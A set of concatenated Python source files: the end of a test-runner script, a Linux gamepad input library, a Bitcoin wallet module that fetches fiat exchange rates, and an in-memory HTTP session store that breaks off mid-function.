    # Command line that asks the executable to list its test cases.
    lang = findMatchLanguage(exe, langs)
    exe = op.abspath(exe)
    return lang['execute'] % {'prog': exe, 'arg': '--show-cases'}


def collectCases(opts, langs, reqQ, resQ):
    # Run every executable with --show-cases (via the worker pool) and build
    # one case descriptor per reported test case.
    exes = []
    for exe in opts.executables:
        exeArgs = getExecutableArgs(exe, langs)
        progDir = op.abspath(op.dirname(exe))
        testDir = op.abspath(op.join(opts.dir, exe))
        if not op.exists(testDir):
            os.makedirs(testDir)
        exes.append({
            'name': exe,
            'execute': exeArgs,
            'cwd': progDir,
            'stdout': op.join(testDir, 'cases.out'),
            'stderr': op.join(testDir, 'cases.err')})
    for e in exes:
        reqQ.put(e)
    cases = []
    for _ in range(len(exes)):
        res = resQ.get()
        assert res[0] == kOk, res
        exe = res[1]
        # Case names are the non-empty lines of the --show-cases output.
        with open(res[2]['stdout']) as f:
            cs = [x.strip() for x in f]
            cs = [x for x in cs if x]
        lang = findMatchLanguage(exe, langs)
        for c in cs:
            cases.append({
                'name': '%s/%s' % (exe, c),
                'execute': lang['execute'] % {'prog': op.abspath(exe), 'arg': c},
                'cwd': res[2]['cwd'],
                'stdout': op.join(opts.dir, exe, '%s.out' % c),
                'stderr': op.join(opts.dir, exe, '%s.err' % c)})
    return cases


def colored(s, color):
    # Colorize only when stdout is a terminal.
    if not os.isatty(sys.stdout.fileno()):
        return s
    else:
        return termcolor.colored(s, color)


def filterCases(opts, cases):
    # Exclude first, then include.
    cases = [x for x in cases if not re.search(opts.exclude, x['name'])]
    cases = [x for x in cases if re.search(opts.include, x['name'])]
    return cases


def dispatchCases(cases, reqQ):
    for cs in cases:
        reqQ.put(cs)


def collectResults(opts, cases, resQ):
    # Drain the result queue, printing progress; returns (passed, failed).
    passed = []
    failed = []
    caseNum = len(cases)
    while len(passed) + len(failed) < caseNum:
        res = resQ.get()
        if res[0] == kOk:
            passed.append(res[2])
            result = colored('pass', 'green')
        elif res[0] == kError:
            failed.append(res[2])
            result = colored('fail', 'red')
        elif res[0] == kTimeout:
            failed.append(res[2])
            result = colored('kill', 'red')
        else:
            # kCancel: abort the whole run.
            error(res[1])
        print('%d/%d %s: %s costs %s secs' % (
            len(passed) + len(failed), caseNum, result,
            res[1], str(res[2]['stop'] - res[2]['start'])))
    return passed, failed


if __name__ == '__main__':
    opts = parseArgs()
    langs = readLangCfg(opts.lang)
    reqQ, resQ, workers = launchWorkers(opts)
    try:
        cases = collectCases(opts, langs, reqQ, resQ)
        cases = filterCases(opts, cases)
        dispatchCases(cases, reqQ)
        _, failed = collectResults(opts, cases, resQ)
        print
        print '%d failed' % len(failed)
        for cs in failed:
            print cs['name']
    finally:
        stopWorkers(reqQ, workers)
gamepad.py
# -*- coding: utf-8 -*-

"""Main module."""

from __future__ import print_function

import os
import struct
import array
import threading
from fcntl import ioctl

# Linux joystick-API axis codes -> kernel axis names.
axis_names = {
    0x00: 'x',
    0x01: 'y',
    0x02: 'z',
    0x03: 'rx',
    0x04: 'ry',
    0x05: 'rz',
    0x06: 'throttle',
    0x07: 'rudder',
    0x08: 'wheel',
    0x09: 'gas',
    0x0a: 'brake',
    0x10: 'hat0x',
    0x11: 'hat0y',
    0x12: 'hat1x',
    0x13: 'hat1y',
    0x14: 'hat2x',
    0x15: 'hat2y',
    0x16: 'hat3x',
    0x17: 'hat3y',
    0x18: 'pressure',
    0x19: 'distance',
    0x1a: 'tilt_x',
    0x1b: 'tilt_y',
    0x1c: 'tool_width',
    0x20: 'volume',
    0x28: 'misc',
}

# Linux joystick-API button codes -> kernel button names.
button_names = {
    0x120: 'trigger',
    0x121: 'thumb',
    0x122: 'thumb2',
    0x123: 'top',
    0x124: 'top2',
    0x125: 'pinkie',
    0x126: 'base',
    0x127: 'base2',
    0x128: 'base3',
    0x129: 'base4',
    0x12a: 'base5',
    0x12b: 'base6',
    0x12f: 'dead',
    0x130: 'a',
    0x131: 'b',
    0x132: 'c',
    0x133: 'x',
    0x134: 'y',
    0x135: 'z',
    0x136: 'tl',
    0x137: 'tr',
    0x138: 'tl2',
    0x139: 'tr2',
    0x13a: 'select',
    0x13b: 'start',
    0x13c: 'mode',
    0x13d: 'thumbl',
    0x13e: 'thumbr',
    0x220: 'dpad_up',
    0x221: 'dpad_down',
    0x222: 'dpad_left',
    0x223: 'dpad_right',
    # XBox 360 controller uses these codes.
    0x2c0: 'dpad_left',
    0x2c1: 'dpad_right',
    0x2c2: 'dpad_up',
    0x2c3: 'dpad_down',
}

# Kernel names -> the "common" event names this library exposes to users.
common_names = {
    "trigger": "btn1",
    "thumb": "btn2",
    "thumb2": "btn3",
    "top": "btn4",
    # "top2": "btn5",
    # "pinkie": "btn6",
    # "base": "btn7",
    # "base2": "btn8",
    # "base3": "btn9",
    # "base4": "btn10",
    "base5": "btn11",
    "base6": "btn12",
    "base": "l1",
    "top2": "l2",
    "base2": "r1",
    "pinkie": "r2",
    "base3": "select",
    "base4": "start",
    "dpad_left": "dpad_left",
    "dpad_up": "dpad_up",
    "dpad_right": "dpad_right",
    "dpad_down": "dpad_down",
    "hat0x": "dpadx",
    "hat0y": "dpady",
    "x": "lx",
    "y": "ly",
    "rz": "rx",
    "z": "ry",
}

# Substrings used to decide whether a /dev/input/js* node is a gamepad.
device_name_keywords = (
    "game",
    "gaming",
    "gamepad",
    "controller",
    "joystick",
)


class Handler:
    # Binds a callback (plus pre-supplied args/kwargs) to an event name.

    def __init__(self, event, fn, *args, **kwargs):
        self.event = event
        self.fn = fn
        self.args = args
        self.kwargs = kwargs

    def __call__(self, *a, **kw):
        # Pre-bound args come first; call-time kwargs override bound ones.
        return self.fn(*(self.args + a), **dict(self.kwargs, **kw))


class Gamepad:
    # Wraps a Linux joystick device (/dev/input/js*) and dispatches events to
    # registered handlers from a background daemon thread.

    def __init__(self, device=None):
        # device: optional explicit device path; if None the first node whose
        # name matches device_name_keywords is used.
        self._device = device
        self._file = None
        self._name = ""
        self._handlers = []
        self._connected = False
        self._num_axes = 0
        self._axis_map = []
        self._axis_states = {}
        self._num_buttons = 0
        self._button_map = []
        self._button_states = {}
        self._thread = threading.Thread(target=self._thread_worker)
        self._thread.setDaemon(True)
        self._thread.start()

    # private methods
    def _get_device_list(self):
        # Yield every joystick device node.
        for filename in os.listdir("/dev/input"):
            if filename.startswith("js"):
                yield os.path.join("/dev/input", filename)

    def _open_device(self, device):
        return open(device, "rb")

    def _get_name(self, _file):
        # JSIOCGNAME: query the device's human-readable name.
        buf = array.array('B', [0] * 64)
        ioctl(_file, 0x80006a13 + (0x10000 * len(buf)), buf)
        return buf.tobytes().decode("utf-8")

    def _get_num_axes(self, _file):
        buf = array.array('B', [0])
        ioctl(_file, 0x80016a11, buf)  # JSIOCGAXES
        return buf[0]

    def _get_num_buttons(self, _file):
        buf = array.array('B', [0])
        ioctl(_file, 0x80016a12, buf)  # JSIOCGBUTTONS
        return buf[0]

    def _init_axis_map(self, _file):
        # Build index -> axis-name map and zero the axis states.
        buf = array.array('B', [0] * 0x40)
        ioctl(_file, 0x80406a32, buf)  # JSIOCGAXMAP
        for axis in buf[:self._get_num_axes(_file)]:
            axis_name = axis_names.get(axis, 'unknown(0x%02x)' % axis)
            self._axis_map.append(axis_name)
            self._axis_states[axis_name] = 0.0

    def _init_button_map(self, _file):
        # Build index -> button-name map and clear the button states.
        buf = array.array('H', [0] * 200)
        ioctl(_file, 0x80406a34, buf)  # JSIOCGBTNMAP
        for button in buf[:self._get_num_buttons(_file)]:
            button_name = button_names.get(button, 'unknown(0x%03x)' % button)
            self._button_map.append(button_name)
            self._button_states[button_name] = False

    # event handlers
    def _handle_button_event(self, button, value):
        # Fires on press for both the bare name and the ":pressed" variant.
        for h in self._handlers:
            if (
                    h.event == common_names[button] or
                    h.event == common_names[button] + ":pressed"):
                h(value, h.event)

    def _handle_button_released_event(self, button, value):
        for h in self._handlers:
            if h.event == common_names[button] + ":released":
                h(value, h.event)

    def _handle_button_changed_event(self, button, value):
        for h in self._handlers:
            if h.event == common_names[button] + ":changed":
                h(value, h.event)

    def _handle_axis_event(self, axis, value):
        for h in self._handlers:
            if h.event == common_names[axis]:
                h(value, h.event)

    def _read_device(self):
        # Read one 8-byte js_event struct and dispatch it.
        event_buf = self._file.read(8)
        if (event_buf):
            ts, value, event_type, number = struct.unpack("IhBB", event_buf)
            if event_type & 0x80:  # initial reading
                return
            # NOTE(review): masks below use 0x81/0x02; after the 0x80 early
            # return, 0x81 behaves like the JS_EVENT_BUTTON bit 0x01 -- confirm.
            if event_type & 0x81:  # button
                button = self._button_map[number]
                if button:
                    self._button_states[button] = bool(value)
                    self._handle_button_changed_event(button, value)
                    if value:
                        self._handle_button_event(button, value)
                    else:
                        self._handle_button_released_event(button, value)
            if event_type & 0x02:  # axis
                axis = self._axis_map[number]
                if axis:
                    # Normalize the raw int16 to [-1.0, 1.0].
                    fvalue = value / 32767.0
                    self._axis_states[axis] = fvalue
                    self._handle_axis_event(axis, fvalue)

    def _connect_to_device(self, device_path):
        # Accept the device only if its name looks gamepad-ish.
        _file = self._open_device(device_path)
        name = self._get_name(_file)
        for kw in device_name_keywords:
            if kw in name.lower():
                self._device = device_path
                self._file = _file
                self._connected = True
                self._on_connect()
                return

    def _update_connection(self):
        if not (self._device and os.path.exists(self._device) and self._connected):
            self._connected = False
            # If the user specifies a device path, use it. Otherwise, make an
            # educated guess
            if self._device:
                self._connect_to_device(self._device)
            else:
                for device_path in self._get_device_list():
                    self._connect_to_device(device_path)

    def _on_connect(self):
        self._init_button_map(self._file)
        self._init_axis_map(self._file)
        self._name = self._get_name(self._file)
        # notify the user that this gamepad is connected
        for handler in self._handlers:
            if handler.event == "connect":
                handler()

    def _on_disconnect(self):
        for handler in self._handlers:
            if handler.event == "disconnect":
                handler()

    def _thread_worker(self, *args):
        # Background loop: maintain the connection and pump device events.
        while (1):
            try:
                self._update_connection()
                if self._connected:
                    self._read_device()
            except IOError:
                if self.connected:
                    self._on_disconnect()

    # public methods/properties
    @property
    def connected(self):
        return self._connected

    @property
    def device(self):
        return self._device

    @property
    def name(self):
        return self._name

    @property
    def inputs(self):
        # All common event names that can be passed to on()/axis()/button().
        return common_names.values()

    def axis(self, axis):
        # Current normalized value of a common-named axis (0.0 when offline).
        if self._connected:
            for k, v in self._axis_states.items():
                if common_names[k] == axis:
                    return v
        else:
            return 0.0

    def button(self, button):
        # Current pressed state of a common-named button (False when offline).
        if self._connected:
            for k, v in self._button_states.items():
                if common_names[k] == button:
                    return bool(v)
        else:
            return False

    def on(self, event, handler, *args, **kwargs):
        # Register `handler` for `event` (a common name, optionally with a
        # ":pressed"/":released"/":changed" suffix, or "connect"/"disconnect").
        self._handlers.append(Handler(event, handler, *args, **kwargs))

    def watch_all(self):
        # Debug helper: print every event of every input.
        def _on_connect():
            print("Gamepad connected: {}".format(self.name))
        self.on("connect", _on_connect)

        def _on_disconnect():
            print("Gamepad disconnected: {}".format(self.name))
        self.on("disconnect", _on_disconnect)

        def f(value, event):
            print("Gamepad: {} => {}".format(event, value))
        for event in self.inputs:
            self.on(event, f)
            self.on(event+":pressed", f)
            self.on(event+":released", f)
            self.on(event+":changed", f)
exchange_rate.py
from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import csv
from decimal import Decimal

from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob

# Number of decimal places used when formatting an amount in a given fiat
# currency (the default elsewhere is 2).
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
                  'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
                  'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
                  'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
                  'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
                  'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}

# Seconds before an outstanding HTTP request to a rate provider is abandoned.
# Without a timeout a dead provider would hang its worker thread forever.
_REQUEST_TIMEOUT = 10


class ExchangeBase(PrintError):
    """Base class for fiat exchange-rate providers.

    Subclasses implement get_rates() and, when history is supported,
    history_ccys() / historical_rates().  Fresh data is reported
    asynchronously through the on_quotes / on_history callbacks.
    """

    def __init__(self, on_quotes, on_history):
        self.history = {}   # ccy -> {'YYYY-MM-DD': rate}
        self.quotes = {}    # ccy -> latest spot rate
        self.on_quotes = on_quotes
        self.on_history = on_history

    def get_json(self, site, get_string):
        """GET https://<site><get_string> and decode the JSON body."""
        # APIs must have https
        url = ''.join(['https://', site, get_string])
        response = requests.request('GET', url,
                                    headers={'User-Agent': 'Wampum'},
                                    timeout=_REQUEST_TIMEOUT)
        return response.json()

    def get_csv(self, site, get_string):
        """GET https://<site><get_string> and parse the body as CSV rows."""
        url = ''.join(['https://', site, get_string])
        response = requests.request('GET', url,
                                    headers={'User-Agent': 'Wampum'},
                                    timeout=_REQUEST_TIMEOUT)
        reader = csv.DictReader(response.content.decode().split('\n'))
        return list(reader)

    def name(self):
        return self.__class__.__name__

    def update_safe(self, ccy):
        """Fetch spot quotes for ccy; errors are logged, never raised.
        on_quotes() fires either way so the UI can refresh."""
        try:
            self.print_error("getting fx quotes for", ccy)
            self.quotes = self.get_rates(ccy)
            self.print_error("received fx quotes")
        except BaseException as e:
            self.print_error("failed fx quotes:", e)
        self.on_quotes()

    def update(self, ccy):
        """Fetch quotes on a background daemon thread."""
        t = Thread(target=self.update_safe, args=(ccy,), daemon=True)
        t.start()

    def get_historical_rates_safe(self, ccy):
        try:
            self.print_error("requesting fx history for", ccy)
            self.history[ccy] = self.historical_rates(ccy)
            self.print_error("received fx history for", ccy)
            self.on_history()
        except BaseException as e:
            self.print_error("failed fx history:", e)

    def get_historical_rates(self, ccy):
        """Return cached history for ccy; kick off a background fetch if
        absent and the provider supports this currency."""
        result = self.history.get(ccy)
        if not result and ccy in self.history_ccys():
            t = Thread(target=self.get_historical_rates_safe, args=(ccy,),
                       daemon=True)
            t.start()
        return result

    def history_ccys(self):
        # Providers with historical data override this.
        return []

    def historical_rate(self, ccy, d_t):
        """Rate for ccy on the day of datetime d_t, or None if unknown."""
        return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))

    def get_currencies(self):
        """Probe the provider and return the sorted 3-letter codes it quotes."""
        rates = self.get_rates('')
        return sorted([str(a) for (a, b) in rates.items()
                       if b is not None and len(a) == 3])


class BitcoinAverage(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('apiv2.bitcoinaverage.com',
                             '/indices/global/ticker/short')
        return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
                     for r in json if r != 'timestamp'])

    def history_ccys(self):
        return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR',
                'ILS', 'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK',
                'SGD', 'USD', 'ZAR']

    def historical_rates(self, ccy):
        history = self.get_csv('apiv2.bitcoinaverage.com',
                               "/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
        return dict([(h['DateTime'][:10], h['Average']) for h in history])


class Bitcointoyou(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
        return {'BRL': Decimal(json['ticker']['last'])}

    def history_ccys(self):
        return ['BRL']


class BitcoinVenezuela(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('api.bitcoinvenezuela.com', '/')
        rates = [(r, json['BTC'][r]) for r in json['BTC']
                 if json['BTC'][r] is not None]  # Giving NULL for LTC
        return dict(rates)

    def history_ccys(self):
        return ['ARS', 'EUR', 'USD', 'VEF']

    def historical_rates(self, ccy):
        return self.get_json('api.bitcoinvenezuela.com',
                             "/historical/index.php?coin=BTC")[ccy + '_BTC']


class Bitmarket(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
        return {'PLN': Decimal(json['last'])}


class BitPay(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('bitpay.com', '/api/rates')
        return dict([(r['code'], Decimal(r['rate'])) for r in json])


class Bitso(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('api.bitso.com', '/v2/ticker')
        return {'MXN': Decimal(json['last'])}


class BitStamp(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('www.bitstamp.net', '/api/ticker/')
        return {'USD': Decimal(json['last'])}


class Bitvalor(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
        return {'BRL': Decimal(json['ticker_1h']['total']['last'])}


class BlockchainInfo(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('blockchain.info', '/ticker')
        return dict([(r, Decimal(json[r]['15m'])) for r in json])


class BTCChina(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('data.btcchina.com', '/data/ticker')
        return {'CNY': Decimal(json['ticker']['last'])}


class BTCParalelo(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('btcparalelo.com', '/api/price')
        return {'VEF': Decimal(json['price'])}


class Coinbase(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('coinbase.com',
                             '/api/v1/currencies/exchange_rates')
        # Keys look like 'btc_to_usd'; strip the 'btc_to_' prefix.
        return dict([(r[7:].upper(), Decimal(json[r]))
                     for r in json if r.startswith('btc_to_')])


class CoinDesk(ExchangeBase):

    def get_rates(self, ccy):
        dicts = self.get_json('api.coindesk.com',
                              '/v1/bpi/supported-currencies.json')
        json = self.get_json('api.coindesk.com',
                             '/v1/bpi/currentprice/%s.json' % ccy)
        ccys = [d['currency'] for d in dicts]
        result = dict.fromkeys(ccys)
        result[ccy] = Decimal(json['bpi'][ccy]['rate_float'])
        return result

    def history_starts(self):
        return {'USD': '2012-11-30'}

    def history_ccys(self):
        return self.history_starts().keys()

    def historical_rates(self, ccy):
        start = self.history_starts()[ccy]
        end = datetime.today().strftime('%Y-%m-%d')
        # Note ?currency and ?index don't work as documented.  Sigh.
        query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
                 % (start, end))
        json = self.get_json('api.coindesk.com', query)
        return json['bpi']


class Coinsecure(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
        return {'INR': Decimal(json['lastprice'] / 100.0)}


class Foxbit(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
        return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}


class itBit(ExchangeBase):

    def get_rates(self, ccy):
        ccys = ['USD', 'EUR', 'SGD']
        json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
        result = dict.fromkeys(ccys)
        if ccy in ccys:
            result[ccy] = Decimal(json['lastPrice'])
        return result


class Kraken(ExchangeBase):

    def get_rates(self, ccy):
        ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY']
        pairs = ['XBT%s' % c for c in ccys]
        json = self.get_json('api.kraken.com',
                             '/0/public/Ticker?pair=%s' % ','.join(pairs))
        return dict((k[-3:], Decimal(float(v['c'][0])))
                    for k, v in json['result'].items())


class LocalBitcoins(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('localbitcoins.com',
                             '/bitcoinaverage/ticker-all-currencies/')
        return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])


class MercadoBitcoin(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
        return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}


class NegocieCoins(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
        return {'BRL': Decimal(json['ticker_1h']['exchanges']['NEG']['last'])}

    def history_ccys(self):
        return ['BRL']


class Unocoin(ExchangeBase):

    def get_rates(self, ccy):
        # Fix: the path must start with '/', otherwise get_json builds the
        # malformed URL 'https://www.unocoin.comtrade?buy'.
        json = self.get_json('www.unocoin.com', '/trade?buy')
        return {'INR': Decimal(json)}


class WEX(ExchangeBase):

    def get_rates(self, ccy):
        json_eur = self.get_json('wex.nz', '/api/3/ticker/btc_eur')
        json_rub = self.get_json('wex.nz', '/api/3/ticker/btc_rur')
        json_usd = self.get_json('wex.nz', '/api/3/ticker/btc_usd')
        return {'EUR': Decimal(json_eur['btc_eur']['last']),
                'RUB': Decimal(json_rub['btc_rur']['last']),
                'USD': Decimal(json_usd['btc_usd']['last'])}


class Winkdex(ExchangeBase):

    def get_rates(self, ccy):
        json = self.get_json('winkdex.com', '/api/v0/price')
        return {'USD': Decimal(json['price'] / 100.0)}

    def history_ccys(self):
        return ['USD']

    def historical_rates(self, ccy):
        json = self.get_json('winkdex.com',
                             "/api/v0/series?start_time=1342915200")
        history = json['series'][0]['results']
        return dict([(h['timestamp'][:10], h['price'] / 100.0)
                     for h in history])


def dictinvert(d):
    """Invert a dict of lists: {k: [v, ...]} -> {v: [k, ...]}."""
    inv = {}
    for k, vlist in d.items():
        for v in vlist:
            keys = inv.setdefault(v, [])
            keys.append(k)
    return inv


def get_exchanges_and_currencies():
    """Return {exchange name: [ccy, ...]}, cached in currencies.json.

    On a cache miss every exchange is probed over the network and the
    result is written back to disk.
    """
    import os, json
    path = os.path.join(os.path.dirname(__file__), 'currencies.json')
    try:
        with open(path, 'r') as f:
            return json.loads(f.read())
    except:
        pass
    d = {}
    is_exchange = lambda obj: (inspect.isclass(obj)
                               and issubclass(obj, ExchangeBase)
                               and obj != ExchangeBase)
    exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
    for name, klass in exchanges.items():
        exchange = klass(None, None)
        try:
            d[name] = exchange.get_currencies()
        except:
            continue
    with open(path, 'w') as f:
        f.write(json.dumps(d, indent=4, sort_keys=True))
    return d


CURRENCIES = get_exchanges_and_currencies()


def get_exchanges_by_ccy(history=True):
    """Map each currency to the exchanges that quote it (with history
    support when history=True)."""
    if not history:
        return dictinvert(CURRENCIES)
    d = {}
    exchanges = CURRENCIES.keys()
    for name in exchanges:
        klass = globals()[name]
        exchange = klass(None, None)
        d[name] = exchange.history_ccys()
    return dictinvert(d)


class FxThread(ThreadJob):
    """Background job that keeps fiat quotes (and optionally history)
    up to date for the configured currency/exchange."""

    def __init__(self, config, network):
        self.config = config
        self.network = network
        self.ccy = self.get_currency()
        self.history_used_spot = False
        self.ccy_combo = None
        self.hist_checkbox = None
        # set_exchange() also initialises self.timeout (the next refresh time)
        self.set_exchange(self.config_exchange())

    def get_currencies(self, h):
        d = get_exchanges_by_ccy(h)
        return sorted(d.keys())

    def get_exchanges_by_ccy(self, ccy, h):
        d = get_exchanges_by_ccy(h)
        return d.get(ccy, [])

    def ccy_amount_str(self, amount, commas):
        """Format a fiat amount with the currency's ISO 4217 precision."""
        prec = CCY_PRECISIONS.get(self.ccy, 2)
        fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
        return fmt_str.format(round(amount, prec))

    def run(self):
        # This runs from the plugins thread which catches exceptions
        if self.is_enabled():
            if self.timeout == 0 and self.show_history():
                self.exchange.get_historical_rates(self.ccy)
            if self.timeout <= time.time():
                self.timeout = time.time() + 150  # refresh every 150s
                self.exchange.update(self.ccy)

    def is_enabled(self):
        return bool(self.config.get('use_exchange_rate'))

    def set_enabled(self, b):
        return self.config.set_key('use_exchange_rate', bool(b))

    def get_history_config(self):
        return bool(self.config.get('history_rates'))

    def set_history_config(self, b):
        self.config.set_key('history_rates', bool(b))

    def get_fiat_address_config(self):
        return bool(self.config.get('fiat_address'))

    def set_fiat_address_config(self, b):
        self.config.set_key('fiat_address', bool(b))

    def get_currency(self):
        '''Use when dynamic fetching is needed'''
        return self.config.get("currency", "EUR")

    def config_exchange(self):
        return self.config.get('use_exchange', 'BitcoinAverage')

    def show_history(self):
        return (self.is_enabled() and self.get_history_config()
                and self.ccy in self.exchange.history_ccys())

    def set_currency(self, ccy):
        self.ccy = ccy
        self.config.set_key('currency', ccy, True)
        self.timeout = 0  # Because self.ccy changes
        self.on_quotes()

    def set_exchange(self, name):
        class_ = globals().get(name, BitcoinAverage)
        self.print_error("using exchange", name)
        if self.config_exchange() != name:
            self.config.set_key('use_exchange', name, True)
        self.exchange = class_(self.on_quotes, self.on_history)
        # A new exchange means new fx quotes, initially empty.  Force
        # a quote refresh
        self.timeout = 0

    def on_quotes(self):
        self.network.trigger_callback('on_quotes')

    def on_history(self):
        self.network.trigger_callback('on_history')

    def exchange_rate(self):
        '''Returns None, or the exchange rate as a Decimal'''
        rate = self.exchange.quotes.get(self.ccy)
        if rate:
            return Decimal(rate)

    def format_amount_and_units(self, btc_balance):
        rate = self.exchange_rate()
        return '' if rate is None else "%s %s" % (
            self.value_str(btc_balance, rate), self.ccy)

    def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
        rate = self.exchange_rate()
        return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (
            base_unit, self.value_str(COIN / (10**(8 - decimal_point)), rate),
            self.ccy)

    def value_str(self, satoshis, rate):
        if satoshis is None:  # Can happen with incomplete history
            return _("Unknown")
        if rate:
            value = Decimal(satoshis) / COIN * Decimal(rate)
            return "%s" % (self.ccy_amount_str(value, True))
        return _("No data")

    def history_rate(self, d_t):
        rate = self.exchange.historical_rate(self.ccy, d_t)
        # Frequently there is no rate for today, until tomorrow :)
        # Use spot quotes in that case
        if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
            rate = self.exchange.quotes.get(self.ccy)
            self.history_used_spot = True
        return rate

    def historical_value_str(self, satoshis, d_t):
        rate = self.history_rate(d_t)
        return self.value_str(satoshis, rate)
_http_session_local_impl.py
# -*- coding: utf-8 -*-
"""In-memory HTTP session implementation for simple_http_server.

Sessions are held in a process-local dict guarded by an RLock; a daemon
thread periodically evicts sessions that are no longer valid.

:Author: MaTianGe
:Create: 2021/1/28 13:20
:Blog: https://safe.shougang.com.cn
Copyright (c) 2021/1/28, ShouAnYun Group All Rights Reserved.
"""
import threading
import uuid
import time
from typing import Any, Dict, Tuple
from threading import RLock

from simple_http_server import Session, SessionFactory, set_session_factory
from simple_http_server.ignore.logger import get_logger

_logger = get_logger("http_session")

# Seconds between background scans for expired sessions (2 hours).
_SESSION_TIME_CLEANING_INTERVAL = 60 * 60 * 2

SESSION_COOKIE_NAME: str = "PY_SIM_HTTP_SER_SESSION_ID"


def _get_from_dict(adict: Dict[str, Any], key: str) -> Any:
    """Return ``adict[key]``, or None when the key is absent or was
    deleted concurrently by another thread (the lookup is not atomic
    with any prior membership test, so we go straight to EAFP)."""
    try:
        return adict[key]
    except KeyError:
        # Fix: the original format string had no argument bound to %s.
        _logger.debug("key %s was deleted in other thread.", key)
        return None


class LocalSessionImpl(Session):
    """A single in-memory session: id, timestamps and a thread-safe
    attribute map."""

    def __init__(self, id: str, creation_time: float, session_fac: SessionFactory):
        super().__init__()
        self.__id = id
        self.__creation_time = creation_time
        self.__last_acessed_time = creation_time
        self.__is_new = True                 # True until the first re-access
        self.__attr_lock = RLock()           # guards writes to __attrs
        self.__attrs: Dict[str, Any] = {}
        self.__ses_fac = session_fac         # owning factory, for invalidate()

    @property
    def id(self) -> str:
        return self.__id

    @property
    def creation_time(self) -> float:
        return self.__creation_time

    @property
    def last_acessed_time(self) -> float:
        return self.__last_acessed_time

    @property
    def is_new(self) -> bool:
        return self.__is_new

    def _set_last_acessed_time(self, last_acessed_time: float):
        # Touching the session also clears the "new" flag.
        self.__last_acessed_time = last_acessed_time
        self.__is_new = False

    @property
    def attribute_names(self) -> Tuple:
        return tuple(self.__attrs.keys())

    def get_attribute(self, name: str) -> Any:
        return _get_from_dict(self.__attrs, name)

    def set_attribute(self, name: str, value: Any) -> None:
        with self.__attr_lock:
            self.__attrs[name] = value

    def invalidate(self) -> None:
        # A last-accessed time of 0 makes the base class's validity check
        # (is_valid, defined in simple_http_server.Session) fail, after
        # which the factory drops the session.
        self._set_last_acessed_time(0)
        self.__ses_fac.clean_session(session_id=self.id)


class LocalSessionFactory(SessionFactory):
    """Factory keeping all sessions in a dict, with lazy start of the
    background cleaning thread on first session creation."""

    def __init__(self):
        self.__sessions: Dict[str, LocalSessionImpl] = {}
        self.__session_lock = RLock()
        self.__started = False
        self.__clearing_thread = threading.Thread(
            target=self._clear_time_out_session_in_bg, daemon=True)

    def _start_cleaning(self):
        # Idempotent: the thread is started at most once.
        if not self.__started:
            self.__started = True
            self.__clearing_thread.start()

    def _create_local_session(self, session_id: str) -> Session:
        sid = session_id if session_id else uuid.uuid4().hex
        return LocalSessionImpl(sid, time.time(), self)

    def _clear_time_out_session_in_bg(self):
        while True:
            time.sleep(_SESSION_TIME_CLEANING_INTERVAL)
            self._clear_time_out_session()

    def _clear_time_out_session(self):
        # Snapshot the items first: other threads add/remove sessions
        # while this daemon thread scans (iterating the live dict could
        # raise RuntimeError on concurrent mutation).
        expired = [k for k, v in list(self.__sessions.items()) if not v.is_valid]
        for k in expired:
            self.clean_session(k)

    def clean_session(self, session_id: str):
        """Drop a session from the cache if it is (still) invalid."""
        if session_id in self.__sessions:
            try:
                _logger.debug("session[#%s] is being cleaned" % session_id)
                sess = self.__sessions[session_id]
                if not sess.is_valid:
                    del self.__sessions[session_id]
            except KeyError:
                _logger.debug("Session[#%s] in session cache is already deleted. " % session_id)

    def _get_session(self, session_id: str) -> LocalSessionImpl:
        if not session_id:
            return None
        sess: LocalSessionImpl = _get_from_dict(self.__sessions, session_id)
